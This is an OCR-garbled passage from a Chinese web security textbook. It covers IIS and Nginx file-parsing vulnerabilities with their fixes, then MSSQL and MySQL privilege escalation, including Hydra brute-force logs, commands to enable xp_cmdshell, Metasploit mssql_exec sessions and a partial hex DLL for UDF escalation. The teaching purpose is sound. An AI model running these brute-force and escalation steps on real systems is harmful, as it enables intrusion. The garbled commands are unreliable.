2. IIS 6.0 文 件 名 解析 漏洞 示例 

test. asps. jpg 文件 的 内 容 是 二 % response. write("Hello World!") % . le X: fr BJ 
扩展 名 是 .jpg, 正 常情 况 下 IIS 容器 不 会 将 它 当 作 ASP 文件 来 解析 ,但 是 由 于 IIS 6.0 # 
在 文件 名 解析 漏洞 ,处 理 test. asp;. jpg 文件 时 ,会 自动 将 分 号 后 面 的 内 容 截 断 , 变 成 
test. asp ,将 其 当 作 ASP 文件, 执行 其 中 的 代码 ,输出 Hello World!, 如 图 12-7 所 示 。 


€ ) © http//www.ctfs-wiki.com/test.asp;jpg 


Hello World! 


12-7 IIS 6.0 文 件 名 解析 示例 
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3. IIS 6.0 目录 解析 漏洞 

当 目 录 的 名 称 是 * .asp、* asa, * .cer #l * . cdx B}, IS 6.0 会 将 目录 里 任何 扩展 名 
的 文件 都 当 作 ASP 文件 来 执行 ,造成 目录 解析 漏洞 。 

为 什么 这 4 种 类 型 的 目录 可 以 解析 ? 这 主要 是 因为 在 IIS 的 配置 文件 中 默认 配置 了 
这 4 个 文件 扩展 名 的 文件 由 asp. dll 来 解析 ,如 图 12-8 所 示 。 


应 用 程序 配置 


图 12-8 IIS 的 解析 配置 


4. IIS 6.0 目录 解析 漏洞 示例 

test. jpg 文件 的 内 容 是 二 % response. writeC" Hello World!1")% ,此 文件 的 扩展 名 
是 .jpg, 正 常情 况 下 IIS 容器 不 会 将 它 当 作 ASP 文件 来 解析 ,但 是 如 果 将 test. jpg 放 到 名 
Jg *.asp. *.asa, * . cer I *. cdx 的 目录 中 ,由 于 IIS 6.0 存在 目录 解析 漏洞 ,就 会 解析 
test. jpg ,执行 其 中 的 代码 ,输出 Hello World! ,如 图 12-9 和 图 12-10 所 示 。 


© http;//www.ctfs-wiki.com/1.asp/testjpg 
Hello World! 


12-9 IIS 6.0 l.asp 目录 解析 漏洞 示例 


( € ) © http//www.ctfs-wiki.com/1.cdx/test jpg 


Hello World! 


12-10 IIS 6.0 1. cdx 目录 解析 漏洞 示例 


12.4.2 IIS 6.0 解析 漏洞 修复 


对 IIS 6.0 解析 漏洞 有 以 下 3 种 修复 方式 : 
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CD 官方 没有 针对 HS 6.0 的 补丁 ,只 能 做 好 权限 限制 ,防止 用 户 自己 创建 目录 ,或 者 
限制 创建 目录 的 名 称 。 

(2) 限制 创建 文件 名 中 带 有 asp; 的 文件 。 

(3) 将 IIS 升 级 至 最 新 版 本 。 


125 US7.x 解 析 漏洞 


IIS 7. x 在 解析 ASP 文件 时 不 存在 解析 漏洞 。 但 是 ,IIS 7. x 在 解析 PHP 文件 时 ， 
PHP 的 配置 文件 默认 开启 cgi. fix_pathinfo。 如 果 设 置 了 cgi. fix_pathinfo 王 1, 则 在 访问 
http: //www. ctfs-wiki. com/x. jpg/x. php 时 ,如 果 x. php 不 存在 ,PHP 会 递归 向 前 解 
Vr ,如 果 x. jpg 存在 ,就 会 把 x. jpg 当 作 PHP 文件 解析 ,由 此 产生 了 解析 漏洞 。 

IIS 在 “处 理 程序 映射 "中 设置 不 同 脚本 语言 的 解析 程序 ,如 图 12-11 所 示 。 


Sik: ERAKO -HESRTA | 分 组 依据 :区域 E- 


°° m o B € à 9$ & m b R G 


Lo; 


NeT 编译 eT RTT .WET 角色 m RES LIUM m a: m ai xm 用 户 am gre SERS HENEH ERFIR 


a = = 


提供 程序 mmniet saga 


R m ë ë w ë > Q e aJn A 
Cor uo MIT? 重 定向 T Mns TSA Siit mme 类 型 。 SSL 设置 vay ku w 错误 页 模块 


e 
默认 文档 — 目录 浏览 PRIA 日 志 身份 验证 ARTER 授权 规则 Sis Iz] 


12-11 在 “处 理 程序 映射 ”中 设置 TIS 对 不 同 脚本 语言 的 解析 程序 


设置 PHP 默认 通过 FastCGI 来 解析 ,如 图 12-12 所 示 。 
PHP 的 配置 文件 默认 开启 cgi. fix_pathinfo ,设置 cgi. fix_pathinfo 一 1 。 


; Disable logging through FastCGI connection. PHP's default behavior is to 
enable 

; this feature. 

; fastcgi.logging-0 

; cgi.rfc2616 headers configuration option tells PHP what type of headers to 
; use when sending HTTP response code. If it's set 0 PHP sends Status:header 
that 

; is supported by Apache. When this option is set to 1 PHP will send 


295 


; RFC2616 compliant header. 

; Default is zero. 

; http://php.net/cgi.rfc2616-headers 
7 cgi.rfc2616 headers-0 

cgi.force redirect-0 

cgi.fix pathinfo-1 
fastcgi.impersonate-1 


mum Web &/&322 4p X m 


e 处 理 程序 映射 
使 用 此 功能 指定 处 理 特定 请 求 类 型 和 响应 的 资源 ， 如 DLL 和 托管 代码 。 
分 组 依据 :状态 | 
AXD-ISAPI-4. 0_64bit *. axd Isspillodule 
cshta-Integrated-4. 0 *. cshta System. Web. HttpForbi deni 
eshtn-ISAPI-4.0 32bit *. eshtn Isspillodule 
cshta-ISAPI-4.0 Bdbit *.eshts Isspillodule 
cshtnl-Integrated-4. 0 *.eshtal Systen. Web. HttpForbi deni. 
cshtml-ISAPI-4. 0 32bit *, eshtnl Isspillodule 
cshtml-ISAPI-4. 0 B4bit *. eshtal Isspillodule 
ExtensionlessUrl-Integrat... + System Web. Handlers. Trans 
Extensi onLessUr1-ISAPI-4. * Isspillodule 
ExtensionlessUrl-ISAPI-4..., + Isspillodule 
HttpRemotingHandlerFactor... * rem System. Runtine. Remoting. C. 
WttpRenotinglandlerFactor. * rem System. Runtime. Remoting C. 
HttpRemotingHandlerFactor... *. rem Isspillodule 
NttpRemotinglandlerFactor... * res Isspillodule 
HttpRemotingHandlerFactor... *.ren Isspillodule 
NttpRemotinglandlerFactor... *.ren Isspillodule 
NttpRemotinglandlerFactor... * soap System Runtime. Remoting. C. 
HttpRemotingHandlerFactor... *. soap System. Runtine. Remoting. C. 
HttpRemotingHandlerFactor... # soap Isspillodule 
HttpRemotingHandlerFactor... #. sosp Isspillodule 
HttpRenotinglandlerFactor... *. soap Isspillodule 
HttpRemotinglandlerFactor... + soap Isspillodule 
OPTIONSVerbMandler * ProtocolSuppor tHlodule 
PagelandlerFactory-Integr... * aspx System Web. UT PageHandler. 
PageMandlerFactory-Integr... * aspx System Web. UT. PageHandler. 
PagelandlerFactory-ISAPI-2.0 * aspx Isspillodule 
PageandlerFactory-ISAPI-... * aspx Isspillodule 
PagelsndlerFactory-ISAPI-... 六 Isspillodule 

* 

*.rules 

*.rules 已 启用 未 指定 Isapillodule 继承 
rules-ISAPI-4.0 64bit *.rules 已 启用 未 指定 IsapiModule "pk 
ScriptMandlerFactoryÁppSe... *_AppService. axd — 已 启用 未 指定 System Web. Script. Service... 继承 
ScriptReseurceIntegrated-4.0 SeriptResource axd 已 启用 未 指定 System Web. Handlers. Scrip... 继承 
Securi tyCerti ficate. *.cer 已 启用 文件 Isapillodule 继承 

12-12 设置 PHP 默认 通过 CGI 来 解析 


在 “处 理 程序 映射 "界面 的 列表 中 双击 FastCGI 行 ,在 弹出 的 “编辑 模块 映射 ?对 话 框 
中 单 击 “ 请 求 限制 ”按钮 ,在 弹出 的 “请 求 限制 ”对 话 框 的 “映射 ”选项 卡 中 选择 “文件 或 文件 
夹 ” 单 选 按 钮 , 即 可 修复 IIS 7. x 解析 漏洞 ,如 图 12-13 所 示 。 


12.5.1 IIS 7.x 解 析 漏 洞 示例 分 析 


test. jpg 文件 的 内 容 是 二 ?php phpinfo();? 盖 ,默认 情况 下 直接 访问 http://www. 
ctfs-wiki. com/test. jpg, 其 中 的 PHP 代码 不 会 被 执行 ,如 图 12-14 所 示 o 
如 果 利 用 TIS 解析 漏洞 输入 http://www. ctfs-wiki. com/test. jpg/x. php ,就 会 执行 
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示例 : *. bas, wsvc.axd 


模块 on) 


[siccae 
本 执行 文件 器 选 ) Œ): 


[P: toS hoec. exe 


Ep 


[Fastor 
请 求 限制 GO. 


€ www.ctfs-wiki.com/test.jpg 


未 指定 


Tv 促 当 请 求 映射 至 以 下 内 容 时 才 调 用 处 理 程序 C) 
个 文件 


System Web. Handlers. Trace. 


TRACEVer bHandl er * 已 启用 未 指定 ProtocolSuppor tllodul e 继承 
vbhtn-Integrated-4.0 *. vbhtn 已 启用 未 指定 System. Web. HttpForbiddenk.. 继承 
vbhtn-ISAPI-4.0 32bit *. vbhtn 已 启用 未 指定 Isapilodule pk 
vbhta-ISAPI-4.0 B4bit *. vbhtm 已 启用 未 指定 IsapiModule 继承 
whhtnl-Integrated-4.0 *. vbhtnl 已 启用 未 指定 System. Web.HttpForbiddeni... 继承 


图 12-13 在 “处 理 程序 映射 "中 设置 “请 求 限制 ” 


$123 解析 漏洞 

@ 处 理 程序 映射 
使 用 此 功能 指定 处 理 特定 请 求 类 型 的 响应 的 资源 ， 如 DLL 和 托管 代码 。 
分 组 依据 状态 Ë 
Ex FS Hi- IET 处 理 程序 [条 目 关 型 “| 
PagelendlerFactory-ISAPI-... *. aspx 已 启用 未 指定 Isspilodule 继承 
FastCGI *. php 已 启用 未 指定 FastCgillodule 本 地 
rules-Integrated-4.0 * rules 已 启用 未 指定 System. Servicellodel. Activ. 继承 
编辑 楼 块 映射 E ERRE 2x 

nee o: *H [ms | 访问 | 


EB "http;//www.ctfs-wiki.com/testjpg" AFE 


图 12-14 直接 访问 test. jpg 不 会 执行 PHP 代码 


test. jpg 中 的 代码 。 


由 于 在 PHP 的 配置 文件 中 设置 了 cgi. fix _pathinfo=1,1 x. php JF f£ TE. PHP 就 
会 递归 向 前 解析 ,test jpg 存在 ,就 会 把 test. jpg 当 作 PHP 文件 解析 ,执行 其 中 的 PHP 


代码 ,如 图 12-15 所 示 。 
12.5.2 


IIS 7.x 解析 漏洞 修复 


修改 PHP 配置 文件 ,设置 cgi. fix_pathinfo 一 0。 修改 完成 后 ,保存 配置 文件 ,然后 重 


启 IIS 服务 器 。 


访问 http://www. ctfs-wiki. com/test. jpg/x. php. 会 提示 “No input file 


specified. ", 如 图 12-16 所 示 。 
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http/wwuictts-wikL.com/testjpg/x.php. ol BRC ` 


System. Windows NT WIN-NO3HENUHTR 6:1 build 7601 
Build Date. Jan 52011 172698. 
Configure escript /nologe configurejs "--enable-snapshet-buld" enable-debug pack! *- 
Command withsnapshor-template=d\php-sdisnap 5 ZwcGoBOvemplate" eph 
builä=c\php-sdk\snap 5 2weSuB pho buid" "ihe pdo-oci-Diphp- 
f "-wihvocB«Dapho-sditeradie 


FE] 12-15 IIS 7.x 解 析 漏 洞 示 例 


会 (€/9 Dhttpy//www.ctfs-wiki.com/testjpg/xphp 


No input file specified. 


图 12-16 IIS 7.x 解 析 漏 洞 修复 的 效果 


126 ”Nginx 解析 漏洞 


Nginx 解 析 漏 洞 也 是 PHP CGI 解析 漏洞 造成 的 , Nginx 在 解析 PHP 文件 时 ， 
PHP 的 配置 文件 默认 开启 cgi. fix_pathinfo。 如 果 设 置 了 cgi. fix pathinfo— 1 , W 7E ij 
间 http: //www. ctfs-wiki. com/x. jpg/x. php 时 ,如 果 x. php 不 存在 ,PHP 会 递归 向 
前 解析 ,如 果 x. jpg 存在 ,就 会 把 x. jpg 当 作 PHP 文 件 解析 ,由 此 产生 了 解析 漏洞 。 

当 Web 应 用 程序 有 文件 上 传 的 功能 时 ,通过 上 传 功能 上 传 图 片 木 马 , 然 后 就 可 以 利 
用 Nginx 解析 漏洞 进行 木马 的 解析 ,如 图 12-17 所 示 。 

Nginx 解析 漏洞 修复 可 以 采用 以 下 两 种 方法 。 


1. 修改 PHP 配置 
修改 PHP 的 配置 文件 ,设置 cgi. fix pathinfo—0 ,修改 完成 后 保存 配置 文件 ,然后 重 
Ji PHP-FPM (FastCGI 进程 管理 器 ) 。 
访问 http: / /www. ctfs-wiki. com/test. jpg/ x. php, 会 提示 “No input file specified. ”, 如 
图 12-18 所 示 。 
修改 PHP 配置 文件 会 影响 到 PATH_INFO 伪 静 态 的 应 用 。 
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€ | O http//www.ctfs-wiki.com/testjpg/xphp C + $ EE 


[system Windows NT TEST-BGEDF20207 52 build 3790 (Windows Server 2003 Enterprise 
Edition Service Pack 2) i585 


图 12-17 Nginx 解析 漏洞 示例 


B € 9 ` nttp//wwwctfs-wikicom/test jpg/x php | 


No input file specified. 


图 12-18 Nginx 解析 漏洞 修复 的 效果 


2. 修改 Nginx 配置 
在 Nginx 配置 文件 中 添加 以 下 配置 。 当 匹配 到 类 似 test. jpg/x. php 的 URL 时 ,会 
返回 错误 代码 403。 修 改 完成 后 ,重启 Nginx。 


if ($fastcgi script name ~\..*\/.*php) ( 
return 403; 
) 


127 ”思考 题 


. 什么 是 解析 漏洞 ? 

. 简 述 Apache 解析 漏洞 的 原理 及 利用 方法 。 
. 简 述 IIS 6. 0 解析 漏洞 的 种 类 及 利用 方法 。 
. 简 述 IIS 7. x 解析 漏洞 的 原理 及 利用 方法 。 
. 简 述 Nginx 解析 漏洞 的 原理 及 利用 方法 。 

. 简 述 PHP CGI 解析 漏洞 的 原理 。 

. 简 述 PHP CGI 解析 漏洞 的 修复 方法 。 


n3 0 m R Q0 t = 
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131 ”SQL Server 数据 库 漏洞 


SQL Server 数据 库 内 置 了 很 多 系统 存储 过 程 。 其 中 ,xp_cmdshell 这 个 存储 过 程 可 
以 以 操作 系统 命令 行 解释 器 的 方式 执行 给 定 的 命令 字符 串 ,并 以 文本 行 方式 返回 相应 的 
输出 ,也 就 是 可 以 通过 xp_cmdshell 执行 系统 命令 。 如 果 SQL Server 是 以 管理 员 权 限 启 
动 的 ,那么 xp_cmdshell 就 可 以 以 管理 员 的 身份 执行 系统 命令 ,以 达到 提 权 的 目的 。 

默认 情况 下 ,只 有 sysadmin 这 个 固定 服务 器 角色 的 成 员 才 能 执行 xp_cmdshell 存储 
过 程 。 但 是 ,也 可 以 授予 其 他 用 户 执行 此 存储 过 程 的 权限 。 

SQL Server 数据 库 提 权 需要 满足 以 下 几 个 条 件 : 

COD 以 管理 员 权 限 启动 SQL Server 服务 。 

(2) 获取 了 SQL Server sysadmin 权限 用 户 的 密码 。 

(3) 可 以 连接 SQL Server。 


13.1.1 利用 xp cmdshell 提 权 


1. 弱 口 令 爆 破 

Hydra 是 Kali Linux 操作 系统 自 带 的 一 款 暴 力 猜 解 工 具 , 它 可 以 对 多 种 不 同 的 服务 
进行 用 户 名 和 密码 爆破 ,可 以 对 AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, 
Firebird, FTP, HTTP-FORM-GET,HTTP-FORM-POST,HTTP-GET,HTTP-HEAD, 
HTTP-PROXY,HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS- 
HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, SQL Server, MySQL, NCP, NNTP, 
Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, 
Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum. SNMP, SOCKS5, 
SSH (vl 和 v2) „Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC fll XMPP 
等 类 型 的 密码 进行 爆破 。 

Hydra 对 SQL Server 数据 库 进 行 用 户 名 和 密码 爆破 的 命令 如 下 ,其 中 参数 L 指定 
用 户 名 字典 ,参数 P 指定 密码 字典 。 


root@kali:~#hydra -L user.txt -P pass.txt -vV -e ns www.ctfs-wiki.com 
mssql 
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Hydra v8.3 (c) 2016 by van Hauser/THC -Please do not use in military or secret 


service organizations, or for illegal purposes. 
Hydra (http://www.thc.org/thc-hydra) starting at 2017-09-12 04:20:24 
[DATA] max 15 tasks per 1 server, overall 64 tasks, 15 login tries (1:3/p:5), ~0 


tries per task 
[DATA] attacking service mssql on port 1433 


[VERBOSE 
[ATTEMPT 
0] (0/0) 
[ATTEMPT 
(0/0) 

[ATTEMPT 
2] (0/0) 
[ATTEMPT 
[child 3] 
[ATTEMPT 
(0/0) 


Resolving addresses ... [VERBOSE] resolving done 
target www.ctfs-wiki.com login "test" -pass "test" -10f 15 [child 


target www.ctfs-wiki.com -login "test" -pass "" -2 of 15 [child 1] 
target www.ctfs-wiki.com -login "test" -pass "sa" -4 of 15 [child 
target www.ctfs- wiki.com - login "test" - pass "admin" - 5 of 15 


(0/0) 
target www.ctfs-wiki.com -login "sa" -pass "sa" -6 of 15 [child 4] 


[ATTEMPT] target www.ctfs-wiki.com login "sa" -pass ""-7 0f 15 [child 5] (0/ 


0) 

[ATTEMPT 
6] (0/0) 
[ATTEMPT 
7] (0/0) 
[ATTEMPT 
[child 8] 
[ATTEMPT 
9] (0/0) 
[ATTEMPT 


target www.ctfs-wiki.com -login "sa" -pass "test" -8 of 15 [child 
target www.ctfs-wiki.com -login "sa" -pass "admin" -10 of 15 [child 
target www.ctfs-wiki.com -login "admin" -pass "admin" -11 of 15 
(0/0) 


target www.ctfs-wiki.com -login "admin" -pass "" -12 of 15 [child 


target www.ctfs- wiki.com -login "admin" - pass "test" -13 of 15 


[child 10] (0/0) 
[ATTEMPT] target www.ctfs-wiki.com -login "admin" -pass "sa" -14 of 15 [child 


11] (0/0) 


[STATUS] attack finished for www.ctfs- wiki. com (waiting for children to 


complete tests) 

[1433] [mssq1] host: www.ctfs-wiki.com login: sa password: sa 

1 of 1 target successfully completed, 1 valid password found 

Hydra (http://www.thc.org/thc-hydra) finished at 2017-09-12 04:20:25 


Hydra 发 现存 在 用 户 名 sa 和 密码 sa, 


2. 利用 SQL Server 客户 端 登 录 进 行 提 权 
此 处 利用 的 SQL Server 客户 端 是 navicat, 其 配置 如 下 : 
。 连接 名 : CTFS-WIKI。 

° 主机 或 IP 地址 : www. ctfs-wiki. com, 

。 端口 : 1433。 

° HPZ: sa, 

。 密码 : sa。 
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3. 利用 xp_cmdshell 提 权 
利用 xp_cmdshell 提 权 的 过 程 如 下 : 
(1) 开启 xp. emdshell 存储 过 程 ,命令 如 下 : 


EXEC sp configure 'show advanced options', 1 
RECONFIGURE 

EXEC sp configure 'xp cmdshell',1 
RECONFIGURE 


下 面 给 出 以 上 命令 的 详解 。 

在 第 1 行 中 ,sp_configure 是 修改 系统 配置 的 存储 过 程 , 当 设置 show advanced 
options 参数 为 1 时 , 才 允 许 修 改 系统 配置 中 的 某 些 高 级 选项 ,系统 中 的 这 些 高 级 选项 默 
认 是 不 允许 修改 的 ,而 xp_cmdshell 是 高 级 选项 参数 之 一 。 

第 2 行 用 于 提交 第 1 行 的 操作 ,更 新 使 用 sp. configure 存储 过 程 更 改 的 配置 选项 的 
当前 配置 。 

第 3 行 执行 sp_configure 存储 过 程 修改 高 级 选项 参数 xp_cmdshell, 这 个 参数 等 于 1 
表示 人 允许 SQL Server 调用 数据 库 之 外 的 操作 系统 命令 。 

第 4 行 用 于 提交 第 3 行 的 操作 ,更 新 使 用 sp. configure 存储 过 程 更 改 的 配置 选项 的 
当前 配置 。 

(2) 执行 系统 命令 查看 当前 用 户 权限 : 


exec xp cmdshell 'whoami ' 


返回 nt authority\system, 表 示 已 经 成 功 提 权 ,获得 了 系统 的 最 高 权限 。 
(3) 关闭 xp_cmdshell 存储 过 程 ,命令 如 下 : 

EXEC sp configure 'xp_cmdshe11',0 

RECONFIGURE 


EXEC sp configure 'show advanced options', 0 
RECONFIGURE 


13.4.2. 利用 MSF 提 权 


1. 启动 MSF 控制 台 
启动 MSF 控制 台 , 如 图 13-1 所 示 。 


2. 弱 口 令 爆破 

利用 MSF 的 SQL Server 爆破 模块 auxiliary/scanner/mssql/mssql login 对 SQL 
Server 数据 库 进行 用 户 名 、 密 码 爆 破 。 设 置 RHOSTS( 目 标 IP Hifi), USERNAME Ot 
据 库 用 户 名 ) .PASS_FILE (数据 库 密码 字典 ) 参 数 ,如 图 13-2 所 示 。 

进行 爆破 ,发 现 用 户 名 和 密码 是 sa 和 sa, 如 图 13-3 所 示 。 
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root@kali:~# msfconsole 


图 13-1 启动 MSF 控制 台 


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro 
Learn more on http://rapid7.com/metasploit 
-[ metasploit v4.14.10-dev ] 
1639 exploits - 944 auxiliary - 289 post ] 
472 payloads - 40 encoders - 9 nops ] 
Free Metasploit Pro trial: http://r-7.co/trymsp ] 


msf auxiliary(mssql login) » set RHOSTS 192.168.91.108 
RHOSTS => 192.168.91.108 

msf auxiliary(mssgl login) > set USERNAME sa 

USERNAME => sa 

maf auxillary(mssql login) > set PASS FILE /root/pass 
PASS FILE => /root/pass 

maf auxiliary(mssql login) > show options 


Module options (auxiliary/scanner/mssql/mssql login): 


Name Current Setting Required Description 

BLANK PASSWORDS false no Try blank passwords for all users 

BRUTEFORCE SPEED 5 yes How fast to bruteforce, from 0 to 5 

DB ALL CREDS false no Try each user/password couple stored in the current database 
DB ALL PASS false no Add all passwords in the current database to the list 

DB ALL USERS false no Add all users in the current database to the list 

PASSWORD no A specific password to authenticate with 

PASS FILE /root/pass no File containing passwords, one per line 

RHOSTS 192.168.91.108 — yes The target address range or CIDR identifier 

REPORT 1433 yes The target port (TCP) 

STOP ON SUCCESS false yes Stop quessing when a credential works for a host 
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption" 

THREADS 1 yes The number of concurrent threads 

USERNAME sa no A specific username to authenticate as 

USERPASS FILE no File containing users and passwords separated by space, one pair per line 
USER AS PASS false no Try the username as the password for all users 

USER FILE no File containing usernames, one per line 

USE WINDOWS AUTRENT false yes Use windows authentification (requires DOMAIN option set) 
VERBOSE true yes Whether to print output for all attempts 


13-2 设置 MSF 参数 


msf auxiliary(mssql login) > run 


[*] 192.168.91.108:1433 - 192.168.91.108:1433 - MSSQL - Starting authentication scanner. 

[-] 192.168.91.108:1433  - 192.168.91.108:1433 - LOGIN FAILED: WORKSTATIONVsa:123456 (Incorrect: 
[-] 192.168.91.108:1433 - 192.168.91.10£:1433 - LOGIN FAILED: WORKSTATIONVsa:admin (Incorrec 
[-] 192.168.91.108:1433  - 192.168.91.108:1433 - LOGIN FAILED: WORKSTATIONNsa:pass (Incorrect: ) 
[+] 192.168.91.108:1433 - 192.168.91.10£:1433 - LOGIN SUCCESSFUL: WORKSTATION VSa:sa 


[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed 
msf auxiliary (mssql login) > 


) 
$ 


图 13-3 ”通过 爆破 获得 用 户 名 、 密 码 
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3. 利用 弱 口 令 提 权 

利用 auxiliary/admin/mssql/mssql exec 模块 进行 提 权 ,设置 RHOST( 目 标 地 址 )、 
PASSWORD( 数 据 库 密码 )\CMD( 要 执行 的 命令 )。 设 置 命令 whoami 后 ,发 现 得 到 的 权 
限 是 系统 的 最 高 权限 , 提 权 成 功 ,如 图 13-4 所 示 。 


msf auxiliary(mssql login) > use auxiliary/admin/mssql/nssql exec 
msf auxiliary(mssql exec) » show options 


Module options (auxiliary/admin/mssql/mssql exec): 


Name Required 
cM cmd.exe /c echo OWNED > C:Vowned.exe no 

PASSWORD no The password for the specified username 

RHOST yes The target address 

RPORT 1433 yes port (TC) 

TDSENCRYPTION false yes SL for TDS data "Force Encryption" 

Usi ES no The username to authenticate as 

USE WINDONS AUTHENT false yes Use windows authentification (requires DOMAIN option set) 


msf auxiliary (mssql exec) > set PASSWORD sa 

PASSWORD => sa 

msf auxiliary(mssql exec) > set CMD cmd.exe/c 'whoami' 
=> cmá.exe/c whoami 

mof auxiliary(mosgl exec) > set RHOST 192.160.91.108 

RHOST => 192.188.91.108 

msf auxiliary(mssql exec) > exploit 


[*J 192.168.91.100:1433 - The server may have xp cmdshell disabled, yino to enable it. 
[*] 192.168.91.108:1433 - SQL Query: EXEC master..xp cmdshell 


output 


nt authorityVsystem 


[*] Auxiliary module execution completed 


图 13-4 利用 mssql exec 模块 提 权 


132 . MySQL 数据 库 漏 洞 


MySQL 是 一 种 开放 源 代码 的 关系 型 数据 库 管理 系统 , 它 使 用 最 常用 的 数据 库 管 理 
语言 一 一 结构 化 查询 语言 (SQL) 进 行 数据 库 管理 。MySQL 的 


标识 如 图 13-5 所 示 。 UN 
本 节 介绍 MySQL UDF 提 权 。 


UDF(User Defined Function) 即 用 户 自 定义 函数 。 用 户 可 MuJSGL 
通过 定义 新 函数 对 MySQL 的 功能 进行 扩充 。 根 据 MySQL 的 ”图 13-5 MySQL 的 标识 
用 户 自 定 义 函 数 功能 向 MySQL 数据 库 中 写 人 包含 系统 命令 的 UDF ,再 通过 调用 此 UDF 
达到 提 权 的 目的 。 


1. 利用 条 件 

利用 MySQL UDF 提 权 需要 满足 以 下 条 件 : 
(1) 以 管理 员 权限 启动 MySQL 服务 。 

(2) 获取 了 MySQL 的 root 用 户 密码 。 

(3) 可 以 连接 MySQL. 


2. MYSQL UDF 提 权 步骤 
MySQL UDF 提 权 步骤 如 下 : 
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CD 对 MySQL 数据 库 进 行 弱 口令 爆破 。 利 用 Hydra 工具 破解 MySQL 数据 库 的 用 
户 名 和 密码 ,命令 如 下 : 


hydra ip MySQL -L user.txt -P pass.txt -V 


爆破 完成 后 ,发 现存 在 用 户 名 root 和 密码 root, 如 图 13-6 所 示 。 


rootükali:-$ hydra www.ctfs-wiki.com mysql -L user.txt -P pass.txt -V 
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service 
organizations, or for illegal purposes. 


Hydra (http://www.thc.org/thc-hydra) starting at 2017-09-12 04:35:06 

[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections) 

[DATA] max 4 tasks per 1 server, overall 64 tasks, 4 login tries (1:2/p:2), -0 tries per task 
[DATA] attacking service mysql on port 3306 

[ATTEMPT] target www.ctfs-wiKi.com - login "root" - pass "test" 
[ATTEMPT] target www.ctfs-wiki.com - login "root" - pass "root" 
[ATTEMPT] target www.ctfs-wiki.com - login "test" - pass "test" 
[ATTEMPT] target www.ctfs-wiki.com - login "test" - pass "root" 
[3306] [myq1] host: www.ctfs-wiki.com login: root password: root 
1 of 1 target successfully completed, 1 valid password found 

Hydra (http://www.thc.org/thc-hydra) finished at 2017-09-12 04:35:06 


K 13-6 Hydra 发 现存 在 用 户 名 root 和 密码 root 


1 of 4 [child 0] (0/0) 
2 of 4 [child 1] (0/0) 
3 of 4 [child 2] (0/0) 
4 
o! 


of 4 [child 3] (0/0) 


(2) 使 用 MySQL 客户 端 登录 。 此 处 用 的 MySQL 客户 端 是 navicat ,配置 如 下 : 
。 连接 名 : CTFS-WIKI。 

。 主机 或 IP 地 址 : www. ctfs-wiki. com, 

。 端口 : 3306。 

。 用 户 名 : root。 

。 密码 : root。 

结果 如 图 13-7 所 示 。 


M 高 级 SSL SSH HTTP 


xl CTFS-WIKI 
主机 名 或 IP 地 址 : www.ctfs-wiki.com 
#0: 3306 
用 户 名 : root 
== m 
[I | 


图 13-7 MySQL 客户 端 navicat 的 配置 


(3) 打开 数据 库 ,新 建 查询 。 在 命令 行 界面 中 打开 mysql 数据 库 , 如 图 13-8 所 示 。 


文件 四 Ho EO SUD 
国 停 上 | HRF O eA | X5 ge 


mysql> use mysql; 
Database changed 
sqi» | 


图 13-8 打开 mysql 数据 库 
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(4) 将 udf. dll 代码 的 十 六 进 制 数 声明 给 my. udf a 变量 : 


set (my udf a-concat('',udf.dll 的 十 六 进 制 ) ; 

set (my udf a-concat (' ', 0x4D5A4B45524E454C33322E444C4C00004C6F61644C6962726 
17279410000000047657450726F63416464726573730000557061636B42794471696E6740000 
00050450D47C357464745023597133A183021767EC2582C1998247CDFCFFEB3149CD81DB2D6 
B61074473258868AEE979BFDCBF77030EBF9F95A1E8762BE25378FA273D57CE8011FC998038 
D3796EDE3937400*-) ; 


结果 如 图 13-9 所 示 。 


文件 里 ) (ag) EV SOW 
Wit | HRF OEA | X50 复制 [Rm | wow 


[mysq1> use mysql; 
Database changed 


gqi» set ZA udf SEE Ox4]5A4B45524E454C33322E444C4CODOD4C6F616 


6F63416464726573730000557061636B42794 
277596£6740000000504500004C010200000000000000000000000000E0000£210801005 
60090000000100100000000003D950200001000000040000000000010001000000002000 
[004000000000000000400000000000000001003000002000000000000020000000000100 
[0001000000000100000100000000000001000000009980200DD020000F19702001400000 
[000C00100900000000000000000000000000000000000000000000000000000000000000 
[000000000000000000000000000000000000000000000000000000000000000000000000 
000000000000000000000000000000000000000000000000000000000000000000000000 
|0000000002E55706163 6B000000800100001000000000000000000000000000000000000 
[000000000 600000E02E72 7372 630000000050010000C00100E6D40000000200000000000 
[00000000000000000600000E088010010E89402 10180000000E000000001000106B97021 


13-9 将 udf. dll 的 十 六 进 制 数 声明 给 变量 
(5) 创建 表 my udf _data, 字 段 为 data, 类 型 为 LONGBLOB: 


create table my udf data (data LONGBLOB); 


结果 如 图 13-10 所 示 。 


mysql» create table my udf data(data LONGBLOB); 
Query OK, 0 rows affected 


图 13-10 创建 表 my udf data 


(6) 将 表 my udf data 更 新 为 @my_udf a 中 的 数据 : 


insert into my udf data values(""); 
update my udf data set data=emy udf a; 


(7) 查看 DLL 文件 的 导出 路 径 s 

在 不 同 版 本 的 MySQL 中 ,DLL 文件 的 导出 路 径 不 一 样 : 

° 5.0 版 以 下 ,导出 路 径 随意 。 

° 5.0 和 5.1 版 , 则 需要 导出 至 目标 服务 器 的 系统 目录 (如 system32) ,否则 在 下 一 
步 操作 中 会 看 到 No paths allowed for shared library 错误 。 

° 5.1 版 以 上 ,需要 导出 DLL 文件 到 插件 路 径 ,插件 路 径 可 以 用 下 面 的 命令 查看 ， 
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show variables like '$plugin$'; 


因为 在 不 同 版 本 的 MySQL 中 ,DLL 文件 的 导出 路 径 不 一 样 ,所 以 首先 要 查看 
MySQL 版 本 信息 ,执行 select @@ version 命令 ,发现 MySQL 的 版 本 是 5. 5. 53, 如 图 13-11 
所 示 。 

数据 库 的 版 本 是 5. 5. 53 ,高 于 5. 1 版 ,需要 用 show variables like '%plugin%' 命 令 查 
看 导出 路 径 。 导 出 路 径 为 C: /Program Files/phpStudy/MySQL/lib/plugin, 如 图 13-12 
